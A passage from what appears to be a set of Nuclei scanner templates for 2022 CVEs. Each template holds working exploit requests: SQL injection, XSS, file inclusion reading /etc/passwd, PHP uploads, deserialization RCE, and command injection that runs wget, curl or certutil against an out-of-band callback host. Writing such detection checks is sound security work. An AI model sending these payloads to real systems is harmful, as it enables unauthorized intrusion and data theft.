/index.php?module=entities/forms&action=save_tab&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&entities_id=24&name=%3cscript%3ealert(document.domain)%3c%2fscript%3e&description=\n"],"cookie-reuse":true,"redirects":true,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-2486","info":{"name":"Wavlink WN535K2/WN535K3 - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /cgi-bin/mesh.cgi?page=upgrade&key=;%27wget+http://{{interactsh-url}};%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-24223","info":{"name":"Atom CMS v2.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 10s\nPOST /admin/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nemail={{randstr}}@gmail.com'+AND+(SELECT+2549+FROM+(SELECT(SLEEP(6)))LIzI)+AND+'uqzM'='uqzM&password={{randstr}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(body, \"Admin Login\") && contains(body, \"Atom.SaveOnBlur\")"],"condition":"and"}]}]},{"id":"CVE-2022-0760","info":{"name":"WordPress Simple Link Directory <7.7.2 - SQL injection","severity":"critical"},"requests":[{"raw":["@timeout 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=qcopd_upvote_action&post_id=(SELECT 3 FROM (SELECT SLEEP(7))enz)\n"],"matchers":[{"type":"dsl","dsl":["duration>=7","status_code == 200 || status_code == 500","contains(content_type, \"text/html\")","contains(body, \"vote_status\") || contains(body, \"critical error\")"],"condition":"and"}]}]},{"id":"CVE-2022-28365","info":{"name":"Reprise License Manager 14.2 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/goforms/rlminfo"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["RLM Version","Platform type"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-30514","info":{"name":"School Dormitory Management System 1.0 - Authenticated Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /dms/admin/login.php?f=login HTTP/1.1\nHost: {{Hostname}}\n\nusername={{username}}&password={{password}}\n","GET /dms/admin/?s=%27%3B%20alert(document.domain)%3B%20s%3D%27 HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["''; alert(document.domain); s='';","School Dormitory Management System"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0679","info":{"name":"WordPress Narnoo Distributor <=2.5.1 - Local File Inclusion","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\n\naction=narnoo_distributor_lib_request&lib_path=/etc/passwd\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28022","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Master.php?f=delete_item HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nid=test'+AND+(SELECT+2844+FROM+(SELECT(SLEEP(6)))FDTM)+AND+'sWZA'='sWZA\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"success\")"],"condition":"and"}]}]},{"id":"CVE-2022-40127","info":{"name":"AirFlow < 2.4.0 - Remote Code Execution","severity":"high"},"requests":[{"raw":["GET /login/ HTTP/1.1\nHost: {{Hostname}}\n","POST /login/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}&_csrf_token={{csrf_token}}\n","@timeout: 15s\nPOST /api/v1/dags/example_bash_operator/dagRuns HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n    \"conf\": {\n\"dag_run\": \"{{randstr}}\"\n},\n  \"dag_run_id\": \"id \\\"&& curl `whoami`.{{interactsh-url}}\",\n  \"logical_date\": \"{{date_time(\"%Y-%M-%D\")}}T{{date_time(\"%H:%m:%s\")}}.920Z\"\n\n}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["state\": \"queued\""]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["type=\"hidden\" value=\"(.*?)\">"],"internal":true}]}]},{"id":"CVE-2022-23881","info":{"name":"ZZZCMS zzzphp 2.1.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /?location=search HTTP/1.1\nHost: {{Hostname}}\nCookies: keys={if:=`certutil -urlcache -split -f https://{{interactsh-url}}/poc`}{end if}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-1598","info":{"name":"WordPress WPQA <5.5 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-json/wp/v2/asked-question"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"id\":","\"rendered\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-1724","info":{"name":"WordPress Simple Membership <4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=swpm_validate_email&fieldId=%22%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"<script>alert(document.domain)</script>\","]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0482","info":{"name":"Easy!Appointments <1.4.3 - Broken Access Control","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","POST /index.php/backend_api/ajax_get_calendar_events HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\ncsrfToken={{csrf_token}}&startDate=2022-01-01&endDate=2022-01-01\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"appointments\":","\"unavailables\":"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"kval","name":"csrf_token","internal":true,"kval":["csrfCookie"],"part":"header"}]}]},{"id":"CVE-2022-31879","info":{"name":"Online Fire Reporting System v1.0 - SQL injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nGET /admin/?page=reports&date=2022-05-24-6'+AND+(SELECT+7774+FROM+(SELECT(SLEEP(6)))dPPt)+AND+'rogN'='rogN HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"Dashboard\")"],"condition":"and"}]}]},{"id":"CVE-2022-38817","info":{"name":"Dapr Dashboard 0.1.0-0.10.0 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/components/statestore","{{BaseURL}}/overview","{{BaseURL}}/controlplane"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<title>Dapr Dashboard</title>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28219","info":{"name":"Zoho ManageEngine ADAudit Plus <7600 - XML Entity Injection/Remote Code Execution","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/agent/tabs/agentData"],"body":"[\n  {\n    \"DomainName\": \"{{Host}}\",\n    \"EventCode\": 4688,\n    \"EventType\": 0,\n    \"TimeGenerated\": 0,\n    \"Task Content\": \"<?xml version=\\\"1.0\\\" encoding=\\\"UTF-8\\\"?><! foo [ <!ENTITY % xxe SYSTEM \\\"http://{{interactsh-url}}\\\"> %xxe; ]>\"\n  }\n]\n","headers":{"Content-Type":"application/json"},"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["ManageEngine"]}]}]},{"id":"CVE-2022-41840","info":{"name":"Welcart eCommerce <=2.7.7 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/usc-e-shop/functions/progress-check.php?progressfile=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0660","info":{"name":"Microweber <1.2.11 - Information Disclosure","severity":"high"},"requests":[{"raw":["POST /api/user_login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","POST /module/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nReferer: {{BaseURL}}admin/view:comments\n\nclass=+module+module-comments-manage+&id=mw_admin_posts_with_comments&data-type=comments%2Fmanage&parent-module-id=mw-main-module-backend&parent-module=comments&data-search-keyword={{randstr}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(body_2,'QueryException')","contains(body_2,'SQLSTATE')","contains(body_2,'runQueryCallback')","contains(header_2,\"text/html\")","status_code_2==500"],"condition":"and"}]}]},{"id":"CVE-2022-34576","info":{"name":"WAVLINK WN535 G3 - Improper Access Control","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/ExportAllSettings.sh"],"matchers-condition":"and","matchers":[{"type":"word","words":["Login=","Password=","Model=","AuthMode="],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-3578","info":{"name":"WordPress ProfileGrid <5.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=pm_add_group&id=\"><script>alert%28document.domain%29<%2Fscript> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"req-condition":true,"matchers":[{"type":"dsl","dsl":["contains(header_2, \"text/html\")","status_code_2 == 200","contains(body_2, \"Extension Options\")","contains(body_2, \"<script>alert(document.domain)</script>&tab\")"],"condition":"and"}]}]},{"id":"CVE-2022-2187","info":{"name":"WordPress Contact Form 7 Captcha <0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/options-general.php?page=cf7sr_edit&\"></script><script>alert(document.domain)</script>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>","Contact Form 7"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-32028","info":{"name":"Car Rental Management System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["POST /admin/ajax.php?action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nusername={{username}}&password={{password}}\n","GET /admin/manage_user.php?id=-1%20union%20select%201,md5({{num}}),3,4,5--+ HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"skip-variables-check":true,"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5({{num}})}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-31269","info":{"name":"Linear eMerge E3-Series - Information Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/test.txt"],"matchers-condition":"and","matchers":[{"type":"word","words":["ID=","Password="],"condition":"and"},{"type":"word","part":"header","words":["text/plain"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["Password='(.+?)'"]}]}]},{"id":"CVE-2022-0148","info":{"name":"WordPress All-in-one Floating Contact Form <2.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=my-sticky-elements-leads&search-contact=xxxx%22%3E%3Cimg+src+onerror%3Dalert%28%60document.domain%60%29+x HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<img src onerror=alert(`document.domain`) x\">"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-25487","info":{"name":"Atom CMS v2.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /admin/uploads.php?id=1 HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------30623082103363803402542706041\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"\n\n\n-----------------------------30623082103363803402542706041\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.php\"\nContent-Type: image/jpeg\n\n\n<?php echo md5('CVE-2022-25487');?>\n-----------------------------30623082103363803402542706041--\n","GET /uploads/{{filename}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["7ee3686858eb89dd68ccf85f0ea03abe"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["SET avatar = '(.*?)'"],"internal":true}]}]},{"id":"CVE-2022-31798","info":{"name":"Nortek Linear eMerge E3-Series - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[",\"CardFormatNo\":\"<img src=x onerror=alert(document.domain)>\"}"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0885","info":{"name":"Member Hero <=1.0.9 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=memberhero_send_form&_memberhero_hook=phpinfo"],"matchers-condition":"and","matchers":[{"type":"word","words":["PHP Extension","PHP Version","<!DOCTYPE html"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":[">PHP Version <\\/td><td class=\"v\">([0-9.]+)"],"part":"body"}]}]},{"id":"CVE-2022-47986","info":{"name":"IBM Aspera Faspex <=4.4.2 PL1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /aspera/faspex/package_relay/relay_package HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: application/json\n\n{\"package_file_list\": [\"/\"], \"external_emails\": \"\\n---\\n- !ruby/object:Gem::Installer\\n    i: x\\n- !ruby/object:Gem::SpecFetcher\\n    i: y\\n- !ruby/object:Gem::Requirement\\n  requirements:\\n    !ruby/object:Gem::Package::TarReader\\n    io: &1 !ruby/object:Net::BufferedIO\\n      io: &1 !ruby/object:Gem::Package::TarReader::Entry\\n         read: 0\\n         header: \\\"pew\\\"\\n      debug_output: &1 !ruby/object:Net::WriteAdapter\\n         socket: &1 !ruby/object:PrettyPrint\\n             output: !ruby/object:Net::WriteAdapter\\n                 socket: &1 !ruby/module \\\"Kernel\\\"\\n                 method_id: :eval\\n             newline: \\\"throw `id`\\\"\\n             buffer: {}\\n             group_stack:\\n              - !ruby/object:PrettyPrint::Group\\n                break: true\\n         method_id: :breakable\\n\", \"package_name\": \"{{rand_base(4)}}\", \"package_note\": \"{{randstr}}\", \"original_sender_name\": \"{{randstr}}\", \"package_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"metadata_human_readable\": \"Yes\", \"forward\": \"pew\", \"metadata_json\": \"{}\", \"delivery_uuid\": \"d7cb6601-6db9-43aa-8e6b-dfb4768647ec\", \"delivery_sender_name\": \"{{rand_base(8)}}\", \"delivery_title\": \"{{rand_base(4)}}\", \"delivery_note\": \"{{rand_base(4)}}\", \"delete_after_download\": true, \"delete_after_download_condition\": \"IDK\"}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"regex","regex":["uid=\\d+\\(([^)]+)\\) gid=\\d+\\(([^)]+)\\)"]},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-31656","info":{"name":"VMware - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/SAAS/t/_/;/WEB-INF/web.xml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<web-app","<servlet-name>"],"condition":"and"},{"type":"word","part":"header","words":["application/xml"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-43185","info":{"name":"Rukovoditel <= 3.2.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /index.php?module=users/login HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php?module=users/login&action=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&username={{username}}&password={{password}}\n","POST /index.php?module=holidays/holidays&action=save&token={{nonce}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&start_date=2023-05-22&end_date=2023-05-31\n"],"cookie-reuse":true,"redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(content_type_3, \"text/html\")","contains(body_3, \"<script>alert(document.domain)</script>\")","contains(body_3, \"rukovoditel\")"],"condition":"and"}],"extractors":[{"type":"regex","name":"nonce","group":1,"regex":["id=\"form_session_token\" value=\"(.*)\" type=\"hidden\""],"internal":true}]}]},{"id":"CVE-2022-35413","info":{"name":"WAPPLES Web Application Firewall <=6.0 - Hardcoded Credentials","severity":"critical"},"requests":[{"raw":["POST /webapi/auth HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{username}}&password={{password}}\n"],"payloads":{"username":["systemi"],"password":["db/wp.no1"]},"attack":"pitchfork","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"res_msg\":\"Authentication Success.\"","\"doc_id\":\"user_systemi\""],"condition":"and"},{"type":"word","part":"header","words":["WP_SESSID="]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-24112","info":{"name":"Apache APISIX - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /apisix/batch-requests HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n\n{\n  \"headers\":{\n    \"X-Real-IP\":\"127.0.0.1\",\n    \"Content-Type\":\"application/json\"\n  },\n  \"timeout\":1500,\n  \"pipeline\":[\n    {\n      \"method\":\"PUT\",\n      \"path\":\"/apisix/admin/routes/index?api_key=edd1c9f034335f136f87ad84b625c8f1\",\n      \"body\":\"{\\r\\n \\\"name\\\": \\\"test\\\", \\\"method\\\": [\\\"GET\\\"],\\r\\n \\\"uri\\\": \\\"/api/{{randstr}}\\\",\\r\\n \\\"upstream\\\":{\\\"type\\\":\\\"roundrobin\\\",\\\"nodes\\\":{\\\"httpbin.org:80\\\":1}}\\r\\n,\\r\\n\\\"filter_func\\\": \\\"function(vars) os.execute('curl {{interactsh-url}}/`whoami`'); return true end\\\"}\"\n    }\n  ]\n}\n","GET /api/{{randstr}} HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: gzip, deflate\nAccept-Language: zh-CN,zh;q=0.9\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["\"reason\":\"OK\"","\"status\":200"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["GET \\/([a-z-]+) HTTP"],"part":"interactsh_request"}]}]},{"id":"CVE-2022-29299","info":{"name":"SolarView Compact 6.00 - 'time_begin' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Solar_History.php?time_begin=xx%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&time_end=&event_level=0&event_pcs=1&search_on=on&search_off=on&word=hj%27&sort_type=0&record=10&command=%95%5C%8E%A6"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script><\"\">","/Solar_History.php\" METHOD=\"post\">"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-28080","info":{"name":"Royal Event - SQL Injection","severity":"high"},"requests":[{"raw":["POST /royal_event/ HTTP/1.1\nHost: {{Hostname}}\nContent-Length: 353\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryCSxQll1eihcqgIgD\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"username\"\n\n{{username}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"password\"\n\n{{password}}\n------WebKitFormBoundaryCSxQll1eihcqgIgD\nContent-Disposition: form-data; name=\"login\"\n\n\n------WebKitFormBoundaryCSxQll1eihcqgIgD--\n","POST /royal_event/btndates_report.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFboH5ITu7DsGIGrD\n\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"todate\"\n\n1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(md5(\"{{randstr}}\"),0x1,0x2),NULL-- -\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"search\"\n\n3\n------WebKitFormBoundaryFboH5ITu7DsGIGrD\nContent-Disposition: form-data; name=\"fromdate\"\n\n01/01/2011\n------WebKitFormBoundaryFboH5ITu7DsGIGrD--\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{{md5(\"{{randstr}}\")}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-45362","info":{"name":"WordPress Paytm Payment Gateway <=2.7.0 - Server-Side Request Forgery","severity":"high"},"requests":[{"raw":["GET /?paytm_action=curltest&url={{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["paytm-payments.css"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4301","info":{"name":"WordPress Sunshine Photo Cart <2.9.15 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?action=register&redirect_to=x%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Registration Form"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-38296","info":{"name":"Cuppa CMS v1.0 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /js/jquery_file_upload/server/php/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary9MZjlIG8fVPjrlCI\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"path\"\n\n/\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"unique_name\"\n\ntrue\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_width\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"resize_height\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"crop\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"compress\"\n\n\n------WebKitFormBoundary9MZjlIG8fVPjrlCI\nContent-Disposition: form-data; name=\"files[]\"; filename=\"test-{{randstr}}.jpg\"\nContent-Type: image/jpeg\n\n<?php\n\necho md5(\"CVE-2022-38296\");\n\n?>\n------WebKitFormBoundary9MZjlIG8fVPjrlCI--\n","POST /js/filemanager/api/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"from\":\"//{{filename}}\",\"to\":\"//{{randstr}}.php\",\"action\":\"rename\"}\n","GET /media/{{randstr}}.php HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_3","words":["ed6bf8b1b4b8e64836455fe32b958c2c"],"condition":"and"},{"type":"word","part":"header_3","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"filename","group":1,"regex":["\"name\":\"(.*?)\","],"internal":true}]}]},{"id":"CVE-2022-22963","info":{"name":"Spring Cloud - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /functionRouter HTTP/1.1\nHost: {{Hostname}}\nspring.cloud.function.routing-expression: T(java.net.InetAddress).getByName(\"{{interactsh-url}}\")\nContent-Type: application/x-www-form-urlencoded\n\n{{rand_base(8)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http","dns"],"condition":"or"},{"type":"status","status":[500]}]}]},{"id":"CVE-2022-0769","info":{"name":"Users Ultra <= 3.1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=rating_vote&data_id=1&data_target=vote_score+%3d+1+AND+(SELECT+3+FROM+(SELECT(SLEEP(6)))gwe)--+\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(content_type, \"text/html\")","contains(body, \"You have to be logged in to leave your rate\")"],"condition":"and"}]}]},{"id":"CVE-2022-21371","info":{"name":"Oracle WebLogic Server Local File Inclusion","severity":"high"},"requests":[{"method":"GET","raw":["GET {{path}} HTTP/1.1\nHost: {{Hostname}}\n\n"],"payloads":{"path":[".//WEB-INF/weblogic.xml",".//WEB-INF/web.xml"]},"stop-at-first-match":true,"unsafe":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"<web-app\") && contains(body, \"</web-app>\")","contains(body, \"<weblogic-web-app\") && contains(body, \"</weblogic-web-app>\")"],"condition":"or"},{"type":"dsl","dsl":["contains(header, \"text/xml\")","contains(header, \"application/xml\")"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-0827","info":{"name":"WordPress Best Books <=2.6.3 - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout 10s\nPOST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\naction=bestbooks_add_transaction&type=x&account=x&date=x&description=1&debit=(CASE WHEN (9277=9277) THEN SLEEP(6) ELSE 9277 END)&credit=1\n"],"matchers":[{"type":"dsl","dsl":["duration_1>=6","status_code == 200","contains(body, \"Account added successfully\")"],"condition":"and"}]}]},{"id":"CVE-2022-32195","info":{"name":"Open edX <2022-06-06 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<a href=\"+8\"onmouseover=\"alert(document.domain)\">click here to go to"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-34328","info":{"name":"PMB 7.3.10 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?lvl=author_see&id=42691%27%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>' target='cart_info"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2022-4260","info":{"name":"WordPress WP-Ban <1.69.1 - Stored Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /wp-admin/admin.php?page=wp-ban/ban-options.php HTTP/1.1\nHost: 